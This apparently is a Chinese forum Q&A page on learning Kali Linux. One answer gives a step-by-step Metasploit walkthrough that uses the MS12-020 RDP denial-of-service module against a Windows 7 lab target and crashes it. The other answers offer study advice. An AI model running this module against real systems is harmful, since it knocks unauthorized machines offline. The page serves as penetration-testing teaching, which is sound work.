分享一个小例子给你
利用msf对MS12-020漏洞进行渗透测试
工具:metasploit
靶机:windows 7 专业版 开启允许远程桌面连接(3389)
主要是复用已知的exploitcode(漏洞)代码对系统进行利用(渗透测试)
第一次使用建议在桌面直接打开,不要在终端上打开,因为首次使用该工具会初始化数据。
选项
banner 显示Logo
search 关键字 利用search搜索可利用的漏洞
search ms12-020 搜索ms12-020漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 应用模块
show options 显示选项
set + 选项名
set rhost 被攻击者ip 例如:set rhost 192.168.10.110
run 对ip的ms12-020漏洞进行攻击
被攻击者蓝屏重启
show auxiliary 显示辅助模块
评论0
加载中...
很高兴回答你的问题我是林创云小编,如果我的回答对你有帮助欢迎给我评论留言或者点赞加个关注!
kali资料,附图如下
由于是安全教材,小编就不直接贴链接了。需要的sixin吧。
友情提示:网络非法外之地,请不要乱做坏事。
评论0
加载中...
要想系统的学习 kali Linux,必须有一个系统的大纲,其次要有一个高效的学习方法。具体该怎么做呢?
首先得有一个明确的目标(你想系统学习 kali Linux,那么到底要达到什么样的学习效果?会渗透测试?还是会用 kali Linux 的 600 多个工具,还是对 kali Linux 这个系统有个全面的了解和认识?),只有目标明确了才能有一个明确的学习路线;
其次,有了明确的目标后,就要开始构建自己的知识体系,要达到自己的目标,应该有怎样的知识体系(需要学习哪些内容? Linux 基础? 网络基础? TCP / IP x协议? web? C 语言等等)构建好了自己的知识体系,学习路线自然也就出来了;
接着就是要有输出了,每天学习了什么,自己有没有总结,有没有讲给别人听等,如果这是死学,那么和书呆子是没有两样的。
还有就是要应用自己学到的知识,当然不是拿去干违法犯罪的事,自己可以搭实验环境验证自己学习的知识是否掌握了。过一段时间就把前面学习的也应用一下,时间久了,学习的东西多了,还可以结合所有学过的知识点做一些大一点的应用。
最后就是学习状态了,我知道很多人的学习都是三分钟热度,坚持下来的很少,所以只有保持自己最初的学习状态,学会自我激励,在遇到困难的时候,想放弃学习的时候想想自己最初的目标实现了吗?如果没有,那就打起精神好好学吧?不忘初心,方得始终!
评论0
加载中...
1.如果只是为了达到能够日常使用的程度,就是多用多查,大多数人推荐看《鸟哥的私房菜》。2.如果只是为了达到能够使用kali系统中的工具,可以查找一些参考书,比如《kali渗透测试技术实战》等,表示我用过wifi破解的工具,没有成功过。3.如果想往安全方面发展,个人认为就不能局限于系统,而要查找安全相关资料,表示我没接触过,具体的东东也不懂。
附:同是初学者,如果有更好的学习方法,希望能多多分享~
评论0
加载中...0
回答0
回答0
回答0
回答0
回答0
回答0
回答0
回答0
回答0
回答
